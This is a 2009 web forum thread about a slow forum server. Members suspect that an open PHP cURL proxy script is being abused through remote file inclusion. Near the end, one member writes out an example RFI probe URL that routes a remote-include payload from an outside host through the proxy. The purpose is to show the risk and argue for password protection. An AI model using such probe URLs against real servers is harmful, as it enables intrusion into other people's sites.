Forum Slow

Postby Spudz » Sun Oct 04, 2009 5:20 am

I have noticed over the last 2 days that the forum virtually comes to a standstill where I have to wait a short time for the board to submit a post or show a page. Today it has been worse than before! Has anyone else noticed this?

It's different, sometimes it runs smoothly, and sometimes I need to wait a minute to load a page. Might be some server "hiccups" ... ?>!

I did wonder if this has anything to do with the Spambot Search Tool as this would slow the forum down if a few people conducted enquiries in the same time.

Sadly, from what I've seen, it's due to the server it's on and it's affinity for "crapping out" as it were. I'm keeping an eye on it however :)

Ahh well at least we now know :) It's not regular, just that it happens when you least need it to.

I dreaded ringing up my ISP again balling them out about the routing like I experianced with the CA forums not long back which they fixed and moved my service.

I don't know whats going on with the forum server but it took me around 45 mins to get on the forum just now. Many more times I get "Tom Engine failure" or similar server down alerts. :( It is getting worse each day.

From what I've seen, I suspect the cause is the hosting companies MySQL server :(

Thats the error I usually see.

Action taken, will depend entirely on what the hosting company has to say.

I've experienced the slowness when posting (or trying to post). Sometimes I wait so long, that I feel I must abort (thus losing the post). YES, there are slow times, Mindblower!

I wonder if the admin at the host ever runs MySQL Administrator, and does a Catalogs/<Any Schema>/Maintenance/Optimize Tables.

Seems like we are fighting a fragmented table, as eventually the blockage clears. Sure hope we aren't experiencing the load PHP Malbots in other V-hosts on the server would cause.

Zap hm?

Yesterday, I could not connect with the forum on several attempts. Earlier this morning, I was able to access the main screen, but not the forum link. Just now I needed to re-register. Something is wrong, Mindblower!

Sorry for the lag on the forum folks.

I've finally submitted a ticket to support to see if they have any ideas on what's causing the issue.

From the support team to my ticket inquiring if they had made any changes to anything:
Hello,

There haven't been any changes made recently. In addition, none of our other customer's has reported any performance issues.

Looking over your account, I do see that your site is running quite a few PHP processes. Have you added any new scripts to your site, or made any changes? I noticed appear to be running a proxy script, which is receiving a large number of requests.

Ummm, uhhhh, hmmmm... I don't want to claim I know more about PHP or server security than you or anyone else on here, but...

All I can think is someone has RFIed you. To see what I mean by this, see http://www.youtube.com/watch?v=r_z0p9SXbc8 (My ZB Block intro manual).

Some of the malware php scripts I have reverse engineered, show the skiddies are using them for proxies. Some don't even require installation on your server, and can be run through a discovered RFI hole while being stored totally on a different remote server. Of course, these proxy servers can only maintain a connection for as long as the max execution time of the server allows (which oddly enough suggests why these outtages seem to be for a somewhat regular length).

Or I could be all wrong and all out of whack. In that case, my apologies. Shooting blind in the dark here with a bent gun barrel.

All I can really say is, that I care.

I'd already been through the scripts hehe, but I can disable the proxy script if necessary? (just gotta find an alternate home for it hehe).

Given the servers are enterprise class and the scripts have been there for well over 12 months, it begs the question of why the problems only started recently?? (would also mean their servers can't handle half as much as my "thrown together myself" servers, lol, which ain't good)

Oh, so there IS a valid proxy script running on this site, and not a clandestine hack affecting it?

K, perhaps the password to the proxy has been compromised, and it's getting abused? Is there a record of where it's going?

The "proxy" isn't actually a proxy in the usual sense of the word, it's just a PHP script containing cURL code that goes out and grabs the URL passed to it. For example;

http://temerc.com/proxy/?url=http://google.com

It's used for my vURL service;

So, does that sanitize, or could a skiddy exploit it for probe/injection like doing...

Code: Select all

http://temerc.com/proxy/?url=http://www.spambotsecurity.com/blog/archives/04-01-2009_04-30-2009.php//images/errors.php?error=http://www.wdiet.c0.kr/img/file/dot.gif??

If so, then it's probably time to look at doing...

Code: Select all

http://temerc.com/proxy/?pass=<password>&url=http://google.com
